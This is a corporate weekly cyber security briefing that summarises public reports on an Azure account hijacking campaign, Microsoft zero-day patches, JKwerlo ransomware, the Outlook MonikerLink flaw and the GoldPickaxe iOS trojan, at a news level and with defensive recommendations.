Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Banking and Finance
Sports
Smart Cities
Cyber Security Briefing, 10 - 16 February
Microsoft Azure Account Hijacking Campaign
Proofpoint has published an analysis about a new campaign in which a cybercriminal group distributes phishing emails to employees to gain access to their Microsoft Azure and Office 365 accounts. Through those emails, they redirect victims to a fake Microsoft login.
As for post-exploitation activities, they use a specific user agent string to access various Microsoft 365 applications, such as Exchange Online, My Signins, My Apps and My Profile, in addition to employing proxies or data hosting services to hide their operational infrastructure. It should be noted that they especially target employees who have more privileges within their organizations, such as directors, managers and executives.
Proofpoint recommends several measures such as monitoring user agent string usage and source domains, resetting compromised passwords, using security tools to detect events or applying standard anti-phishing mitigations.
Microsoft patches two actively exploited 0-days
Microsoft has released new updates in the context of February´s Patch Tuesday patching a total of 73 vulnerabilities, 30 of which would allow an attacker to execute remote code. Among the fixed flaws, two actively exploited 0-days stand out: CVE-2024-21351 and CVE-2024-21412, both rated as high severity flaws according to Microsoft. The first of them would allow a threat actor to bypass Windows SmartScreen security controls.
However, in order to be exploited, an authorized attacker would first have to convince the user to open a malicious file. Microsoft has not detailed how or by which threat actor this vulnerability has been exploited. On the other hand, CVE-2024-21412 affects Internet Shortcut File and would allow an unauthenticated attacker to send a file to the user that would allow them to bypass Mark of the Web (MoTW) security controls.
Moreover, according to Trend Micro this flaw has been exploited by the threat actor Water Hydra to deploy the DarkMe Remote Access Trojan (RAT).
JKwerlo ransomware targets Spanish and French users
Researchers at Cyble Research & Intelligence Labs (CRIL) have discovered a new ransomware written in Go which they have named JKwerlo and whose attacks target Spanish and French-speaking users.
Initial access appears to be gained through supposedly legal phishing emails with HTML attachments and embedded ZIP files that either directly deploy the ransomware payload, as is the case with the Spanish emails, or initiate a series of events that end with the deployment of the ransomware, as observed in the French emails.
In the French campaign, the use of PowerShell scripts was observed to download and execute other Dropbox files, finally executing another PowerShell script that deploys JKwerlo. Likewise, this ransomware uses PsExec and Rubeus to move laterally across the network, deleting Resmon.exe and Tasmgr.exe in the process in order not to be monitored.
#MonikerLink bug, an RCE vulnerability in Outlook
A Check Point researcher has discovered a security flaw in Outlook that allows remote access to resources and code execution through the use of a malicious link. The problem is due to the use of an insecure API (MkParseDisplayName) that treats the link as a Moniker Link, a way of looking for COM objects in Windows, which can invoke applications such as Word or Excel as COM servers and exploit their vulnerabilities.
It is worth noting that the flaw is not only in Outlook, but also in other programs that use the API, being a risk similar to Log4Shell. The vulnerability, which has a PoC, has been identified as CVE-2024-21413, CVSS of 9.8 and affects the latest versions of Windows and Office.
GoldPickaxe trojan for iOS steals biometric data
Cybersecurity group Group-IB has discovered a new iOS Trojan called GoldPickaxe.iOS, designed to steal facial recognition data, identity documents and intercept SMS. The threat has been attributed to the GoldFactory group.
The trojan has been active since mid-2023 in Asia, mainly in Thailand and Vietnam. The attack method is to impersonate local banks and government organizations. The threat actor uses AI-based services to create deepfakes, allowing unauthorized access to victims' bank accounts. Mobile Device Management (MDM) has been used to manipulate Apple devices and malicious links have been distributed via messaging to lure victims to fraudulent apps.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
